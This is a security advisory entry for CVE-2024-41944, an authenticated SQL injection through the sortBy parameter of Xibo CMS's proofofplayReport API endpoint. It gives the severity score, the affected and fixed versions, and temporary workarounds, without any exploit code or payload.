PT-2024-29652 · Xibo · Xibo
Sergey Bobrov
·
Published
2024-07-30
·
Updated
2024-08-13
·
CVE-2024-41944
CVSS v3.1
6.5
Medium
| Vector | AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N |
Name of the Vulnerable Software and Affected Versions
Xibo versions prior to 3.3.12
Xibo versions prior to 4.0.14
Description
A SQL injection issue was discovered in the "report/data/proofofplayReport" API endpoint inside the Xibo content management system. This allows an authenticated user to obtain and modify arbitrary data from the Xibo database by injecting specially crafted values into the
sortBy parameter.Recommendations
For versions prior to 3.3.12, upgrade to version 3.3.12 to resolve the issue.
For versions prior to 4.0.14, upgrade to version 4.0.14 to resolve the issue.
As a temporary workaround, consider restricting access to the "report/data/proofofplayReport" API endpoint until a patch is applied.
Avoid using the
sortBy parameter in the affected API endpoint until the issue is resolved.Exploit
Fix
SQL injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Xibo